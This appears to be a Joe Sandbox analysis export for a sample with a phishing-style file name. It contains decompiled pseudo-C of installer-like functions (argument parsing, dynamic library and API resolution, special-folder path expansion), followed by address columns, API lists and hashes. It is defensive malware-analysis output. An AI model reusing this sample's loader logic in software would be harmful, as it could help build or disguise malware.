					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c24
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00406054 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00406054(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				intOrPtr _t93;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t93 =  *0x7a7a1c; // 0x9ae6de
					_t48 =  *(_t93 - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x7a8a78 + _t48 * 2;
				_t49 = 0x7a69e0;
				_t114 = 0x7a69e0;
				if(_a4 >= 0x7a69e0 && _a4 - 0x7a69e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406054(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x7a69e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = (_a8 << 0xb) + 0x7a9000;
							E00406032(_t114, (_a8 << 0xb) + 0x7a9000);
						} else {
							E00405F79(_t114,  *0x7a8a48);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004062C6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7a8ac4;
						if( *0x7a8ac4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x7a8a44;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406054(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406032(_a4, _t49);
			}

0x00406054
0x00406054
0x00406054
0x0040605a
0x0040605f
0x00406061
0x00406070
0x00406070
0x00406078
0x00406079
0x0040607a
0x0040607b
0x0040607e
0x00406086
0x00406088
0x004060a1
0x004060a4
0x004060a4
0x004062a0
0x004062a0
0x004062a6
0x00000000
0x00000000
0x004060b4
0x004060ba
0x00000000
0x00000000
0x004060c2
0x004060c3
0x004060c5
0x004060c9
0x004060cc
0x0040628d
0x0040629b
0x0040629e
0x0040629e
0x0040628f
0x00406292
0x00406295
0x00406297
0x00406297
0x00000000
0x0040628d
0x004060d2
0x004060d5
0x004060e4
0x004060ea
0x004060ed
0x004060f0
0x004060fa
0x004060ff
0x00406101
0x00406105
0x00406108
0x0040610b
0x0040610e
0x0040622e
0x00406232
0x00406267
0x0040626b
0x00406270
0x00406275
0x00406275
0x0040627a
0x0040627b
0x00406280
0x00406283
0x00406286
0x00000000
0x00406286
0x00406234
0x00406238
0x0040624e
0x00406255
0x0040623a
0x00406241
0x00406241
0x00406260
0x00406263
0x00406226
0x00406227
0x00406227
0x00000000
0x00406263
0x00406116
0x00406117
0x0040611d
0x0040611f
0x00406139
0x00406139
0x00406140
0x00406140
0x00406147
0x0040614b
